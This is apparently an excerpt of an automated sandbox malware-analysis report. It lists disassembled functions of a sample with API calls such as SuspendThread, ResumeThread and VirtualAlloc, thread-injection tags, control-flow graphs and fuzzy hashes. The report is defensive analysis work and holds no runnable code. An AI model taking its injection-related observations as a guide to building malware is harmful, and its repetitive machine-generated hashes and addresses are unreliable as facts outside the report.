                                                                                                                    • Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction ID: e48b75a810cad9d39b3c763df9f4bef7b2fcddf86e84aaf9a64b9c552ae663c9
                                                                                                                    • Opcode Fuzzy Hash: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction Fuzzy Hash: 22517D3090D79C8FDB56DFA8C865AE9BFF0EF16310F1441ABD049DB2A2DA359846CB11
                                                                                                                    Function 00007FFD9B93E7FD Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 741 7ffd9b93e7fd-7ffd9b93e809 742 7ffd9b93e814-7ffd9b93e8e2 SuspendThread 741->742 743 7ffd9b93e80b-7ffd9b93e813 741->743 746 7ffd9b93e8e4 742->746 747 7ffd9b93e8ea-7ffd9b93e934 742->747 743->742 746->747
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SuspendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3178671153-0
                                                                                                                    • Opcode ID: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction ID: 744c7afa4209507a184df4cb0544d0ba4d2585f49e86659d2fac44981b7f6b6e
                                                                                                                    • Opcode Fuzzy Hash: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction Fuzzy Hash: BC413C70E0864C8FDB98DFA8C895AEDBBF0FF5A310F10416AD04DE7292DA74A845CB41
                                                                                                                    Function 00007FFD9B941E85 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 750 7ffd9b941e85-7ffd9b941f63 GetFileAttributesW 753 7ffd9b941f65 750->753 754 7ffd9b941f6b-7ffd9b941fa9 750->754 753->754
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction ID: 0bb66de4614c0c6de665e0e0497a669237762d4a137e78935dac070dec4c094b
                                                                                                                    • Opcode Fuzzy Hash: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction Fuzzy Hash: D941F870E08A1C8FDB98DF98D895BEDBBF1EB59310F10416ED049E7252DA71A846CB44
                                                                                                                    Function 00007FFD9B7CCF20 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TH_H
                                                                                                                    • API String ID: 0-1585845160
                                                                                                                    • Opcode ID: 95ea4ce09d4654553ef473af572b5fbb334f371dc7260009d0e920075b2de845
                                                                                                                    • Instruction ID: 671f946221129397d788c9df56e9021a31b753f5d7159e3ccf81459dceac4783
                                                                                                                    • Opcode Fuzzy Hash: 95ea4ce09d4654553ef473af572b5fbb334f371dc7260009d0e920075b2de845
                                                                                                                    • Instruction Fuzzy Hash: A6C15E71A18A5D9FDBA8EF58C4A5BB8B7A1FF54300F4442BDD01DD32A6DE346980CB41
                                                                                                                    Function 00007FFD9B79372D Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 846 7ffd9b79372d-7ffd9b793863 VirtualAlloc 851 7ffd9b793865 846->851 852 7ffd9b79386b-7ffd9b7938cf 846->852 851->852
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b78d000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: eda584647d28daa6d9b1280bfef5b5acf336a8d12755e006344db384b0aefcf7
                                                                                                                    • Instruction ID: c21d3e8f22fbc7788f38a65508ebf7959bf29b694d1a014f94112a1b701deab8
                                                                                                                    • Opcode Fuzzy Hash: eda584647d28daa6d9b1280bfef5b5acf336a8d12755e006344db384b0aefcf7
                                                                                                                    • Instruction Fuzzy Hash: 2D512970908A5C8FDF94EF68C845BE9BBF1FB69310F1041AAD04DE3255DB75A9858B80
                                                                                                                    Function 00007FFD9B940169 Relevance: 1.4, APIs: 1, Instructions: 144COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 855 7ffd9b940169-7ffd9b940175 856 7ffd9b940180-7ffd9b940252 CloseHandle 855->856 857 7ffd9b940177-7ffd9b94017f 855->857 860 7ffd9b940254 856->860 861 7ffd9b94025a-7ffd9b9402ae 856->861 857->856 860->861
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction ID: 58b8bef947dcb42319759f4f69d6e2050b5f14eefce13ebf0a88e385d3b821be
                                                                                                                    • Opcode Fuzzy Hash: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction Fuzzy Hash: 9C416D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD049E7292DA74A985CB01
                                                                                                                    Function 00007FFD9B7CAD19 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1054 7ffd9b7cad19-7ffd9b7cad47 1055 7ffd9b7cad49 1054->1055 1056 7ffd9b7cad4e-7ffd9b7cad5e 1054->1056 1055->1056 1059 7ffd9b7cad61-7ffd9b7cad75 1056->1059 1060 7ffd9b7cadb4-7ffd9b7cadb6 1056->1060 1061 7ffd9b7cadb8 1060->1061 1062 7ffd9b7cadbd-7ffd9b7cadd9 1060->1062 1061->1062 1064 7ffd9b7caddf-7ffd9b7cadec 1062->1064
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 0-3372436214
                                                                                                                    • Opcode ID: ea17aa5ace0bc0fa617e74031baabf0598c13ad7f6588423e8a96fdf91119bef
                                                                                                                    • Instruction ID: 1cb0b6c423e1672268bbcae2c64e1ca738b2615d0b52699088e973efba882016
                                                                                                                    • Opcode Fuzzy Hash: ea17aa5ace0bc0fa617e74031baabf0598c13ad7f6588423e8a96fdf91119bef
                                                                                                                    • Instruction Fuzzy Hash: DF117F31A09A4D9FDF55EF58C8949E97BB0FF68306F0501AAD419C71A6CA34A945CB40
                                                                                                                    Function 00007FFD9B783FC1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: o
                                                                                                                    • API String ID: 0-252678980
                                                                                                                    • Opcode ID: d70d75d8225c3b2abc160c996b0b7c1841f55d1dc7e6c2fe93f8a0aa497fa58b
                                                                                                                    • Instruction ID: d0eb7fa26f78906db95ec54eced7ee871cefe94474bc2e128d6165b01cc86845
                                                                                                                    • Opcode Fuzzy Hash: d70d75d8225c3b2abc160c996b0b7c1841f55d1dc7e6c2fe93f8a0aa497fa58b
                                                                                                                    • Instruction Fuzzy Hash: 81113D70E0665E8FEB78DB08C8A46EC73B2EB54316F0042FAD51DA62A5CA741E858F44
                                                                                                                    Function 00007FFD9B7D0481 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;
                                                                                                                    • API String ID: 0-1661535913
                                                                                                                    • Opcode ID: e812c0081c9786c8ca7fba0279781140ab7f35c452d8749dce580e59640458b4
                                                                                                                    • Instruction ID: 45673076753de59ebdb980709c74b761236c6891a1893557ada8d3dc48ad4846
                                                                                                                    • Opcode Fuzzy Hash: e812c0081c9786c8ca7fba0279781140ab7f35c452d8749dce580e59640458b4
                                                                                                                    • Instruction Fuzzy Hash: A401ED7090962D8BEBB9DF44C4587B873B6EB58305F5042ADC01D922B1CB786A89CF05
                                                                                                                    Function 00007FFD9B7CF556 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;
                                                                                                                    • API String ID: 0-1661535913
                                                                                                                    • Opcode ID: 77c35d95848e40947d6d23c5bcdca9377130eda43ceb752806506bc9a48850f4
                                                                                                                    • Instruction ID: 14770f830e7bb27c4d176587f52360a3d7454a8692a61967b59054ba6481e59e
                                                                                                                    • Opcode Fuzzy Hash: 77c35d95848e40947d6d23c5bcdca9377130eda43ceb752806506bc9a48850f4
                                                                                                                    • Instruction Fuzzy Hash: 19D0677090962D9ADBA4EF0484547A876A5EB18340F5001AD950DD22A1CB345B84CB55
                                                                                                                    Function 00007FFD9B79D947 Relevance: .4, Instructions: 404COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd5d8637e151de96718940a6658645c074d320e57146f1970fa1bca60f14724a
                                                                                                                    • Instruction ID: eab13bef9d4b532c3e4592ed2a7850ba5529b5104f5c71f1be0880f7a7ebde62
                                                                                                                    • Opcode Fuzzy Hash: cd5d8637e151de96718940a6658645c074d320e57146f1970fa1bca60f14724a
                                                                                                                    • Instruction Fuzzy Hash: 1EF1C271A09A1D8FEBA4DF58C895BA9B7B1FF58301F1442E9D01DD32A2DA356E81CF40
                                                                                                                    Function 00007FFD9B7DCDF0 Relevance: .3, Instructions: 308COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 75d4dbd6d4cc6b1a8b8f0e29a6234976783061b6bdbb107a8b311a94bc937970
                                                                                                                    • Instruction ID: 9306e743849e08ebf5af1ac733f20a1b9da0af35d69810d61ae72cdbe2abd134
                                                                                                                    • Opcode Fuzzy Hash: 75d4dbd6d4cc6b1a8b8f0e29a6234976783061b6bdbb107a8b311a94bc937970
                                                                                                                    • Instruction Fuzzy Hash: 67810331B1DA0A4FDB68EB58D491975B3E2FFA835071103BDD05EC76A6DE24F8468780
                                                                                                                    Function 00007FFD9B7DCE38 Relevance: .3, Instructions: 285COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d9c8a64c34e4f6e637007d1a79f6b43ef7c4a18f36cbbf440c176d75e03186b1
                                                                                                                    • Instruction ID: 2d7ea12cdde367ec7a44e9c7d8fd3d8877591dd5083fc699e3ed3452b0a68967
                                                                                                                    • Opcode Fuzzy Hash: d9c8a64c34e4f6e637007d1a79f6b43ef7c4a18f36cbbf440c176d75e03186b1
                                                                                                                    • Instruction Fuzzy Hash: 1881D672B09A0D4FDFA8DA5CD465AB977E1EBE4341F05037AD00DD32B5DE21AC468780
                                                                                                                    Function 00007FFD9B7D9AC8 Relevance: .2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8ad7e6ea7664f063fd3dacd997ba7c4fbe0b35615a967a7d99f71f4191ff7c3d
                                                                                                                    • Instruction ID: d154361371716cccae1b0038eb027f2ba88ec406d178ec3d138cfbf9a3e614a6
                                                                                                                    • Opcode Fuzzy Hash: 8ad7e6ea7664f063fd3dacd997ba7c4fbe0b35615a967a7d99f71f4191ff7c3d
                                                                                                                    • Instruction Fuzzy Hash: 6D51E271E09A4D8BDB58CF6888616AD77A2FFD8340F15037AD04DEB3B2CE3469058751
                                                                                                                    Function 00007FFD9B7DCCB8 Relevance: .2, Instructions: 176COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a955843b2c1fc7978365ead811dfa0911ae4772a94f87f57507f5fdce6bb7310
                                                                                                                    • Instruction ID: 5d7a074d3533e5315204aa97d90c1fea699f39b9f406c0f3993c6501ea063a60
                                                                                                                    • Opcode Fuzzy Hash: a955843b2c1fc7978365ead811dfa0911ae4772a94f87f57507f5fdce6bb7310
                                                                                                                    • Instruction Fuzzy Hash: 61413B31B19F4E4FDF98EB6C8864A7977D1FF94390B4002FAD05DC72A6DD24A8098740
                                                                                                                    Function 00007FFD9B7DBAD5 Relevance: .2, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 83439903dd3318e057bbef6155ef5e49ee4dcda958ab442b2073c02f4d007b10
                                                                                                                    • Instruction ID: a36b231d6a2f9dc774c3c0775785aaf66e7cf588732ac575d1c1832954f77000
                                                                                                                    • Opcode Fuzzy Hash: 83439903dd3318e057bbef6155ef5e49ee4dcda958ab442b2073c02f4d007b10
                                                                                                                    • Instruction Fuzzy Hash: 1E510431A0DB8D4FDB95DF68D8642AA7BF1FFC9350F0903BBE049D72A6DA2459058381
                                                                                                                    Function 00007FFD9B7DD133 Relevance: .1, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ae83dd3e4c7b9fd04125ae946ea97fafe9e43753ed8725e5de3a82ff646b6093
                                                                                                                    • Instruction ID: 4f2fc06cb17b1b0591b1c35c7f6522e311ab71540355e03fc6dc506817a5110b
                                                                                                                    • Opcode Fuzzy Hash: ae83dd3e4c7b9fd04125ae946ea97fafe9e43753ed8725e5de3a82ff646b6093
                                                                                                                    • Instruction Fuzzy Hash: E6516671E09A5D8FEB94DB9C88657ACBBF1FB98340F0503B9D01DE36A2DE3469448B41
                                                                                                                    Function 00007FFD9B7DCDFD Relevance: .1, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aee3df722af2478a074b70bc764915363334c44ffe5889c315d9ce7cdfc3ec35
                                                                                                                    • Instruction ID: 2c47f556e9f27c4a18050d2e4ce998d320e3004242aaf512cd9cacb555ba012d
                                                                                                                    • Opcode Fuzzy Hash: aee3df722af2478a074b70bc764915363334c44ffe5889c315d9ce7cdfc3ec35
                                                                                                                    • Instruction Fuzzy Hash: 5D411871B0EF4D0BEB789A9C886537977E1EBD5780F15437EE409D32B2DD11AD0A8281
                                                                                                                    Function 00007FFD9B7DD9E9 Relevance: .1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3c41bbb7cb91c5dfc3266d48d9d14bf0524158bc1383654ec781608c40a67ef
                                                                                                                    • Instruction ID: ea04365149ec15f1f871fdc516db2030394d9e5504051d4b2b7951068ade59d2
                                                                                                                    • Opcode Fuzzy Hash: b3c41bbb7cb91c5dfc3266d48d9d14bf0524158bc1383654ec781608c40a67ef
                                                                                                                    • Instruction Fuzzy Hash: FD311771B0EF4E0BEB789AA8486577577E2EFD5781F05037EE408D32B2DD10AC098681
                                                                                                                    Function 00007FFD9B7988E9 Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B797000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B797000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b797000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 821ca032bb52a4a699b65e1d1c43d91ba65d27c016479e5f4ad5f9a3857aa1cc
                                                                                                                    • Instruction ID: b15b0a8e75617972f33aab821eab676b2e643f76a2660142569f2e12d2b33a32
                                                                                                                    • Opcode Fuzzy Hash: 821ca032bb52a4a699b65e1d1c43d91ba65d27c016479e5f4ad5f9a3857aa1cc
                                                                                                                    • Instruction Fuzzy Hash: 4A51B030A08A4D8FCF84DF98D494AED7BF1FF58350B0502A6E409E7261DB34E990CB80
                                                                                                                    Function 00007FFD9B7DD681 Relevance: .1, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55b102b2bc98d728ccce240bcdcdfcd5d1ac1c3cc096417b72f8ad6dd6f15979
                                                                                                                    • Instruction ID: 766325ac71094e47a8f7f9ebcd31083fce9fabeda9d82f353b4eb34ec8e9776c
                                                                                                                    • Opcode Fuzzy Hash: 55b102b2bc98d728ccce240bcdcdfcd5d1ac1c3cc096417b72f8ad6dd6f15979
                                                                                                                    • Instruction Fuzzy Hash: 30312661B0EF4E0FDFA9E66C5464A657BD2EF9839070003FAD04DC71B6ED14AD098380
                                                                                                                    Function 00007FFD9B7DCF20 Relevance: .1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a27e8a371ea2435067cda352c7bf542d51084080ca40d4ade9f1118371a78fd1
                                                                                                                    • Instruction ID: dd0e2ec214974c457baf984465622a33e6bb64ab3e4be28871f7f7bd3d630df1
                                                                                                                    • Opcode Fuzzy Hash: a27e8a371ea2435067cda352c7bf542d51084080ca40d4ade9f1118371a78fd1
                                                                                                                    • Instruction Fuzzy Hash: E9312731B19A4E4FDB99EB6C84A056277E2FFD8344B1643B6D40CC71ABDA29E809C340
                                                                                                                    Function 00007FFD9B7DDB09 Relevance: .1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80fab7bc5d434592a16f431197f56b9703bdfd5a33620a7a84119508474bb560
                                                                                                                    • Instruction ID: e9560122420310532704ccc0cf79359ca715518b16641e652d902c97dc2e5586
                                                                                                                    • Opcode Fuzzy Hash: 80fab7bc5d434592a16f431197f56b9703bdfd5a33620a7a84119508474bb560
                                                                                                                    • Instruction Fuzzy Hash: 0E313031A08A0C8FDF55EBA8D855DECB7F1EFA5311B14426AD00ADB165DA31A986CB80
                                                                                                                    Function 00007FFD9B7DD5D1 Relevance: .1, Instructions: 97COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2a20f7ef5c23300ebcc320d1054497f6f636391497ec053fd5c14d040edf6e6
                                                                                                                    • Instruction ID: bf8be0ca965b0172219a5a3b044975882f14000ae654102d22664ef04fde1fd7
                                                                                                                    • Opcode Fuzzy Hash: b2a20f7ef5c23300ebcc320d1054497f6f636391497ec053fd5c14d040edf6e6
                                                                                                                    • Instruction Fuzzy Hash: 4E112B21B0DF5D0FDBB8956C28296B63BC1DBD92A1B0503BBE40DC32B5EC15AD0543D1
                                                                                                                    Function 00007FFD9B78705A Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ced7b0175b9cddf98818f814515d904a940a3dde9e8c3e50d7221befb2e0f3b
